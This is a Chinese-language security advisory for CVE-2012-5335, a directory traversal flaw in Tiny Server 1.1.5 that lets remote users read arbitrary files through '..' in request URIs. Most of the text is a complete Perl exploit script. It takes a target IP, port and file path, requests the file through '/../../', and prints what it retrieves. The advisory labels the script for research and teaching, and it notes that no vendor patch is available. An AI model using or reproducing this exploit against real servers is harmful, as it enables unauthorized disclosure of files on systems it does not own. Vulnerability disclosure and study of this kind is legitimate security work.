发布日期:2012-03-17
更新日期:2012-10-10
受影响系统:
Tiny Server Tiny Server 1.1.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52541
CVE ID: CVE-2012-5335
Tiny Server是个基本的HTTP服务器。
Tiny Server 1.1.5存在目录遍历漏洞,可允许远程攻击者通过HTTP请求内的URI中的“..”读取任意文件。
<*来源:KaHPeSeSe
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl -w
#Title : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit
#Author : KaHPeSeSe
#Test : PERFECT XP PC1 / SP3
#Date : 15/03/2012
#Thanks : exploit-db.com
use LWP::Simple;
use LWP::UserAgent;
system('color','A');
system('cls');
print "\n\t____________________________________________________________________\n";
print "\n\t....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit .......\n";
print "\n\t....... Founded and Exploited by KaHPeSeSe .......\n";
print "\n\t____________________________________________________________________\n\n";
if(@ARGV < 3)
{
print "[-] Error!\n";
print "[-] Look to example\n\n";
&help; exit();
}
sub help()
{
print "[+] How to : perl $0 IP Port File\n";
print "[+] Example : perl $0 192.168.1.2 80 windows/system.ini\n";
}
($TargetIP, $Port, $File) = @ARGV;
print("Connet to Server.... \n");
sleep(2);
$path="/../../";
my $link = "http://" . $TargetIP . ":" . $Port . $path . $File;
print("Connected\n");
sleep(2);
print("Waiting for moment\n");
sleep(1);
print("Done! Reading $File...\n");
sleep(3);
$ourfile=get $link;
if($ourfile)
{
print("\n\n____________________________________________________\n\n");
print("$ourfile \n\n");
print("_____________________________________________________\n\n");
}
else
{
print("_____________________________________________________\n\n");
print(" Not Found !!!\n\n");
print("_____________________________________________________\n\n");
exit;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Tiny Server
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: